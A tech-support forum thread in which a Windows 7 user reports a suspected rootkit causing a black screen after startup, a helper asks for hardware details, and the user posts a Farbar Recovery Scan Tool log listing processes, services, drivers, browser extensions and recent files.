Jump to content

Welcome to Geeks to Go - Register now for FREE

Need help with your computer or device? Want to learn new tech skills? You're in the right place!
Geeks to Go is a friendly community of tech experts who can solve any problem you have. Just create a free account and post your question. Our volunteers will reply quickly and guide you through the steps. Don't let tech troubles stop you. Join Geeks to Go now and get the support you need!

How it Works Create Account
Photo

Windows turns black after startup (possible due to esvhnqcv.sys)

Started by Viper Jr. , Mar 17 2018 06:59 AM

  • Please log in to reply

#1
Viper Jr.
Posted 17 March 2018 - 06:59 AM

Viper Jr.

    Member

  • Member
  • PipPip
  • 33 posts

Hello!

It seems that I recently got infected with virus/malicious software on my desktop computer. Upon starting the computer and entering Windows, everything turns black after a few seconds, and I can't do anything other than turning the computer off (by pressing the Power button). In addition to this, a lot of programs seems to have installed themselves as well, although I am not sure if these are truly dangerous programs or just bloatware or something similar. I think Malwarebytes Anti-Malware were also uninstalled, but I am not sure at this point (since I reinstalled it). My System Restore Points seems to have be removed as well. As off now, I have unplugged the Ethernet cable as well as a HDD I had as media storage.

Since I can't really do anything in normal mode, I have tried some things in fail-safe mode (without network connection):

  • Running several full (and manually updated) Malwarebytes Anti-Malware scans (including root kits).
  • Running several full Microsoft Security Essential scans
  • Running Malwarebytes AdwCleaner
  • Running (and manually update (as best as I managed)) Spybot Search and Destroy 2.0
  • Running Malwarebytes Anti-Rootkit

I also tried to in normal mode start with just the basic startups via msconfig, but that did not change anything.

 

During this, several infected files where found and removed, all of which where located at the C-disk (Windows partition). Unfortunately, I did not save any of the logs. However, a certain "esvhnqcv.sys", labeled as a rootkit by Malwarebytes, were not successfully removed (despite several reboots) until I ran Malwarebytes Anti-Rootkit, after which all scans come up empty.

 

I know that I am supposed to provide a FRST-log with the topic, as per the instruction on the Malware removal guide. However, since I can't navigate the computer long enough in Normal mode to do this, I am unsure whether I should run it in fail-safe mode or not.

 

I am at a loss here, since I really don't know how to approach this. I would be very grateful if anyone would offer their time and expertise. I will gladly make a donation for your help.

 


Edited by Viper Jr., 17 March 2018 - 02:00 PM.

  • 0

Advertisements

#2
zep516
Posted 17 March 2018 - 07:50 PM

zep516

    Trusted Helper

  • Malware Removal
  • 8,090 posts
Hi! My name is zep516 and Welcome to Geekstogo!
I'll do the best I can to resolve your computer issue
Please make sure to carefully read any instruction that I give you. If you're not sure, or if something unexpected happens, don't continue Stop and ask! Never be afraid to ask questions! :)

It also sounds like a possible video driver problem.
Please include the make an model of the computer, laptop, desktop, operating system. etc

Post the FRST logs from safe mode.
  • 0

#3
Viper Jr.
Posted 18 March 2018 - 02:19 AM

Viper Jr.

    Member

  • Topic Starter
  • Member
  • PipPip
  • 33 posts

Thank you for taking the time to help me. I really appreciate it.

 

I'm running a desktop computer with Windows 7 Ultimate Service pack 1 with the following specifications:

  • MSI GeForce GTX 770 4GB TwinFrozr GAMING-series
  • Intel Core i7 4770K 3.5 GHz (Haswell)
  • ASUS Z87-A ATX
  • A-Data 16GB (2x8GB) CL9 1600MHz XPG
  • be quiet! Straight Power E9 680W 80+ Gold
  • Samsung SSD Pro Basic 840-Series 256GB
  • 2TB Seagate Barracuda 7200rpm 64MB

Here are the two FRST-logs, from running it in fail-safe mode:

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 14.03.2018
Ran by Martin (administrator) on OVERLORD (18-03-2018 09:05:41)
Running from D:\User profile\Desktop
Loaded Profiles: Martin (Available Profiles: Martin)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Safe Mode (minimal)
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dinotify.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM-x32\...\Run: [] => [X]
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\RunOnce: [Install Spybot - Search & Destroy] => "G:\spybotsd-2.6.46.exe"
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\RunOnce: [Report] => C:\AdwCleaner\AdwCleaner[C1].tx
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\MountPoints2: F - F:\setup.exe
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\MountPoints2: {6c4e0517-4ea1-11e3-8ffc-74d02b96086c} - H:\LaunchU3.exe -a
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\MountPoints2: {d6896687-cb1f-11e3-a1c7-74d02b96086c} - H:\AutoRun.exe {D2D77DC2-8299-11D1-8949-444553540000} 5.2066.1.A14B04 PID_0083 {01D42BF0-ED08-463f-8A28-99EB6FEE962B}
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\MountPoints2: {ec015733-b07d-11e7-9a6f-74d02b96086c} - I:\HiSuiteDownLoader.exe
BootExecute: autocheck autochk * sdnclean64.exe

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\..\Interfaces\{458E592A-DE20-42E8-8C67-65C88F2A797D}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page =
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617911&ResetID=131643942694512768&GUID=72AA9CAC-BF0C-4EEC-B561-2B576365F905
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://se.msn.com/?ocid=iehp
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2017-12-12] (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre6\bin\ssv.dll [2014-02-01] (Sun Microsystems, Inc.)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2014-01-23] (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll [2014-02-01] (Sun Microsystems, Inc.)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office15\URLREDIR.DLL [2014-01-22] (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2017-02-23] (Microsoft Corporation)
DPF: HKLM-x32 {7530BFB8-7293-4D34-9923-61A11451AFC5} hxxp://download.eset.com/special/eos/OnlineScanner.cab
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL [2017-08-15] (Microsoft Corporation)

FireFox:
========
FF DefaultProfile: 9am9eglk.default
FF ProfilePath: C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default [2018-03-02]
FF Homepage: Mozilla\Firefox\Profiles\9am9eglk.default -> hxxps://www.malwarebytes.org/restorebrowser/
FF Extension: (Auto Refresh) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\[email protected] [2016-04-28] [Legacy]
FF Extension: (bug643770(Stop Autoscroll by mouse wheel)) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\[email protected] [2016-04-28] [Legacy]
FF Extension: (Extra Padding When Maximized) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\[email protected] [2016-04-28] [Legacy]
FF Extension: (Paste and Go Hotkey (Keyboard Shortcut)) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\[email protected] [2016-04-27] [Legacy]
FF Extension: (Gif Delayer) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\[email protected] [2016-04-27] [Legacy]
FF Extension: (YouTube ALL HTML5) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\[email protected] [2017-08-29] [Legacy]
FF Extension: ("Manage search engines" button) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\[email protected] [2017-09-12] [Legacy]
FF Extension: (No Close Buttons) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\[email protected] [2016-11-02] [Legacy]
FF Extension: (Secure Login) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\[email protected] [2017-02-25] [Legacy]
FF Extension: (Super Start) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\[email protected] [2015-12-05] [Legacy]
FF Extension: (Tab Deque) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\[email protected] [2017-11-26]
FF Extension: (Tab Kit - Mouse Gestures) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\[email protected] [2017-03-05] [Legacy]
FF Extension: (uBlock Origin) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\[email protected] [2018-01-15]
FF Extension: (Undo Closed Tabs Button) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\[email protected] [2016-08-26] [Legacy]
FF Extension: (Zotero Connector) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\[email protected] [2017-12-14]
FF Extension: (Zotero Word for Windows Integration) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\[email protected] [2016-10-15] [Legacy]
FF Extension: (uBlock) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{2b10c1c8-a11f-4bad-fe9c-1c11e82cac42}.xpi [2015-12-05] [Legacy]
FF Extension: (FT DeepDark) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{77d2ed30-4cd2-11e0-b8af-0800200c9a66} [2017-10-17] [Legacy]
FF Extension: (All-in-One Gestures) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{8b86149f-01fb-4842-9dd8-4d7eb02fd055} [2016-04-27] [Legacy]
FF Extension: (Single Key Tab Switch) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{a66191d8-898b-4a66-89be-d5b279477a54}.xpi [2015-12-31] [Legacy]
FF Extension: (LeechBlock) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{a95d8332-e4b4-6e7f-98ac-20b733364387} [2017-11-15] [Legacy]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_28_0_0_161.dll [2018-02-06] ()
FF Plugin: @java.com/DTPlugin,version=1.6.0_45 -> C:\Windows\system32\npdeployJava1.dll [2014-02-01] (Sun Microsystems, Inc.)
FF Plugin: @java.com/JavaPlugin -> C:\Program Files\Java\jre6\bin\plugin2\npjp2.dll [2014-02-01] (Sun Microsystems, Inc.)
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~2\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_28_0_0_161.dll [2018-02-06] ()
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll [2014-01-06] (Google, Inc.)
FF Plugin-x32: @live.heroesandgenerals.com/npretox -> D:\Spel\Heroes & Generals\live\npretox-1.0.6.1\npretoxlive-1.0.6.1.dll [2014-05-07] (Reto-Moto ApS)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-07-19] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office15\NPSPWRAP.DLL [2014-01-22] (Microsoft Corporation)
FF Plugin-x32: @mozilla.zeniko.ch/SumatraPDF_Browser_Plugin -> C:\Program Files (x86)\SumatraPDF\npPdfViewer.dll [2013-10-02] (Simon Bünzli)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2018-02-23] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2018-02-23] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-13] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-13] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-02-11] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1755371218-3412237994-1746218496-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Martin\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-12-27] (Unity Technologies ApS)
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\secure_cert.js [2018-03-01]

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default [2018-03-02]
CHR Extension: (Slides) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-10-19]
CHR Extension: (Docs) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-19]
CHR Extension: (Google Drive) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-12-12]
CHR Extension: (YouTube) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-24]
CHR Extension: (Google Search) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-12-12]
CHR Extension: (Sheets) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-10-19]
CHR Extension: (Heroes & Generals) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbophcdhblbipoaacgchllkobdaolpge [2014-05-11]
CHR Extension: (Google Docs Offline) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-10-20]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-23]
CHR Extension: (Gmail) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-06-15]
CHR Extension: (Chrome Media Router) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-01-23]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S4 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [7013384 2018-02-08] ()
S4 DisplayFusionService; C:\Program Files (x86)\DisplayFusion\DisplayFusionService.exe [1375600 2013-11-27] (Binary Fortress Software)
S3 EasyAntiCheat; C:\Windows\SysWOW64\EasyAntiCheat.exe [399120 2017-02-13] (EasyAntiCheat Ltd)
S4 HiPatchService; D:\Spel\Tribes Ascend\HiPatchService.exe [9728 2017-07-12] (Hi-Rez Studios) [File not signed]
S4 HnGSteamService; D:\Spel\Steam Library\steamapps\common\Heroes & Generals\hngservice.exe [777000 2018-02-27] (Reto-Moto ApS)
S4 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6234056 2017-11-01] (Malwarebytes)
R2 MsMpSvc; C:\Program Files\Microsoft Security Client\MsMpEng.exe [119864 2016-11-14] (Microsoft Corporation)
S3 NisSrv; C:\Program Files\Microsoft Security Client\NisSrv.exe [361816 2016-11-14] (Microsoft Corporation)
S4 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [519992 2018-01-10] (NVIDIA Corporation)
S4 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [519992 2018-01-10] (NVIDIA Corporation)
S4 Origin Client Service; D:\Spel\Origin\OriginClientService.exe [2122248 2016-06-25] (Electronic Arts)
S2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [66872 2013-11-11] ()
S2 PnkBstrB; C:\Windows\SysWOW64\PnkBstrB.exe [107832 2013-11-11] ()
S4 Razer Game Scanner Service; C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe [189264 2016-09-25] ()
S4 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1776864 2017-05-23] (Safer-Networking Ltd.)
S4 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2131760 2017-05-23] (Safer-Networking Ltd.)
S4 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [233936 2017-05-23] (Safer-Networking Ltd.)
S4 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [5419792 2014-11-28] (TeamViewer GmbH)
S4 TunngleService; C:\Program Files (x86)\Tunngle\TnglCtrl.exe [814064 2015-12-22] (Tunngle.net GmbH) [File not signed]
S4 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
S4 WsAppService; C:\Program Files (x86)\Wondershare\WAF\2.4.2.223\WsAppService.exe [473312 2017-03-20] (Wondershare)
S4 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
S3 NvStreamNetworkSvc; "C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe" [X]
S2 NvStreamSvc; "C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe" [X]
S4 NvTelemetryContainer; "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\plugins" -r
S2 WsDrvInst; C:\Program Files (x86)\Wondershare\dr.fone toolkit for Android\Library\DriverInstaller\DriverInstall.exe [X]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [283064 2013-10-18] (Disc Soft Ltd)
R3 ElbyCDFL; C:\Windows\System32\Drivers\ElbyCDFL.sys [40648 2007-02-16] (SlySoft, Inc.)
R3 ElbyCDFL; C:\Windows\SysWOW64\Drivers\ElbyCDFL.sys [40648 2007-02-16] (SlySoft, Inc.)
S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [43664 2015-05-08] ()
S3 I1KBFLTR; C:\Windows\System32\drivers\I1KBFLTR.sys [29440 2014-06-26] ()
S3 massfilter_hs; C:\Windows\system32\drivers\massfilter_hs.sys [20232 2012-06-08] (HandSet Incorporated)
S3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [253880 2018-03-02] (Malwarebytes)
S0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [295000 2016-08-25] (Microsoft Corporation)
S3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [135928 2016-08-25] (Microsoft Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [31024 2018-01-10] (NVIDIA Corporation)
S3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [59240 2017-12-15] (NVIDIA Corporation)
R3 nvvhci; C:\Windows\System32\DRIVERS\nvvhci.sys [57976 2017-11-16] (NVIDIA Corporation)
S3 OCUSBVID; C:\Windows\System32\DRIVERS\OCUSBVID.sys [62072 2015-06-16] (Oculus VR, LLC)
S1 prilock; C:\Windows\System32\drivers\prilock.sys [122776 2018-02-08] ()
R3 rzdaendpt; C:\Windows\System32\DRIVERS\rzdaendpt.sys [43720 2015-08-13] (Razer Inc)
S3 rzp1endpt; C:\Windows\System32\DRIVERS\rzp1endpt.sys [50904 2015-08-13] (Razer Inc)
S2 rzpmgrk; C:\Windows\system32\drivers\rzpmgrk.sys [44144 2016-09-17] (Razer, Inc.)
S2 rzpnk; C:\Windows\system32\drivers\rzpnk.sys [130880 2015-12-14] (Razer, Inc.)
R3 rzvkeyboard; C:\Windows\System32\DRIVERS\rzvkeyboard.sys [44232 2015-08-13] (Razer Inc)
S3 rzvmouse; C:\Windows\System32\DRIVERS\rzvmouse.sys [42712 2015-08-13] (Razer Inc)
S3 SaiK075C; C:\Windows\System32\DRIVERS\SaiK075C.sys [179872 2014-08-05] (Saitek)
S3 SaiMini; C:\Windows\System32\DRIVERS\SaiMini.sys [25120 2013-04-30] (Saitek)
S3 SaiNtBus; C:\Windows\System32\drivers\SaiBus.sys [52640 2013-04-30] (Saitek)
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [381440 2013-10-18] (Duplex Secure Ltd.)
S3 ssdevfactory; C:\Windows\System32\DRIVERS\ssdevfactory.sys [46408 2017-06-02] (SteelSeries ApS)
S3 tap0901t; C:\Windows\System32\DRIVERS\tap0901t.sys [47736 2015-12-21] (Tunngle.net)
S3 xb1usb; C:\Windows\System32\DRIVERS\xb1usb.sys [34016 2014-05-27] (Microsoft Corporation)
S3 zghsmdm; C:\Windows\System32\DRIVERS\zghsmdm.sys [131080 2012-06-08] (ZTE Incorporated)
S3 ALSysIO; \??\C:\Users\Martin\AppData\Local\Temp\ALSysIO64.sys [X] <==== ATTENTION
S1 gdgqdwdi; \??\C:\Windows\system32\drivers\gdgqdwdi.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-03-18 09:03 - 2018-03-18 09:05 - 000000000 ____D C:\FRST
2018-03-02 12:09 - 2018-03-02 12:09 - 000345720 _____ C:\Windows\Minidump\030218-7519-01.dmp
2018-03-02 11:13 - 2018-03-02 11:13 - 000406768 _____ C:\Windows\Minidump\030218-8314-01.dmp
2018-03-02 11:07 - 2018-03-02 11:11 - 000000000 ____D C:\AdwCleaner
2018-03-02 10:22 - 2018-03-02 10:22 - 000407760 _____ C:\Windows\Minidump\030218-8564-01.dmp
2018-03-02 10:21 - 2018-03-02 11:15 - 000000258 __RSH C:\ProgramData\ntuser.pol
2018-03-02 09:25 - 2018-03-02 09:25 - 000255928 _____ (Malwarebytes) C:\Windows\system32\Drivers\642A2717.sys
2018-03-02 09:16 - 2018-03-02 10:27 - 000192952 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2018-03-02 09:16 - 2018-03-02 09:44 - 000000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2018-03-02 09:16 - 2018-03-02 09:16 - 000255928 _____ (Malwarebytes) C:\Windows\system32\Drivers\5143D20B.sys
2018-03-02 09:16 - 2018-03-02 09:16 - 000000000 ____D C:\Program Files (x86)\mbar
2018-03-02 08:33 - 2018-03-02 08:33 - 000272600 _____ C:\Windows\Minidump\030218-7675-01.dmp
2018-03-02 08:24 - 2018-03-02 08:24 - 000001404 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2018-03-02 08:24 - 2018-03-02 08:24 - 000001392 _____ C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
2018-03-02 08:24 - 2018-03-02 08:24 - 000000656 _____ C:\Windows\Tasks\Check for updates (Spybot - Search & Destroy).job
2018-03-02 08:24 - 2018-03-02 08:24 - 000000628 _____ C:\Windows\Tasks\Refresh immunization (Spybot - Search & Destroy).job
2018-03-02 08:24 - 2018-03-02 08:24 - 000000458 _____ C:\Windows\Tasks\Scan the system (Spybot - Search & Destroy).job
2018-03-02 08:24 - 2018-03-02 08:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2018-03-02 08:24 - 2017-05-23 09:22 - 000032240 _____ (Safer-Networking Ltd.) C:\Windows\system32\sdnclean64.exe
2018-03-02 08:21 - 2018-03-02 08:21 - 000000085 _____ C:\Windows\wininit.ini
2018-03-02 08:12 - 2018-03-02 08:12 - 000404320 _____ C:\Windows\Minidump\030218-10608-01.dmp
2018-03-02 08:11 - 2018-03-02 11:15 - 000000258 __RSH C:\Users\Martin\ntuser.pol
2018-03-02 08:11 - 2018-03-02 08:11 - 000000000 _____ C:\Users\Martin\AppData\Local\{9D703F0F-0DEB-403A-ABF0-858F9D72DBB8}
2018-03-02 07:57 - 2018-03-02 07:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2018-03-02 07:45 - 2018-03-02 07:45 - 000272600 _____ C:\Windows\Minidump\030218-7129-01.dmp
2018-03-02 07:45 - 2018-03-02 07:45 - 000000000 ____D C:\Windows\LastGood
2018-03-01 17:27 - 2018-03-01 17:27 - 000000000 ____D C:\Program Files\Malwarebytes
2018-03-01 17:27 - 2017-11-29 09:11 - 000077432 _____ C:\Windows\system32\Drivers\mbae64.sys
2018-03-01 17:26 - 2018-03-02 12:09 - 590156355 _____ C:\Windows\MEMORY.DMP
2018-03-01 17:26 - 2018-03-01 17:26 - 000407952 _____ C:\Windows\Minidump\030118-7472-01.dmp
2018-03-01 17:14 - 2018-03-18 09:02 - 001178610 _____ C:\Windows\ntbtlog.txt
2018-03-01 17:10 - 2018-03-01 17:10 - 000001032 _____ C:\Users\Public\Desktop\Lightning.lnk
2018-03-01 17:10 - 2018-03-01 17:10 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lightning
2018-03-01 17:10 - 2018-03-01 17:10 - 000000000 ____D C:\Program Files (x86)\Lightning
2018-03-01 17:09 - 2018-03-02 09:14 - 000000000 ____D C:\Disk
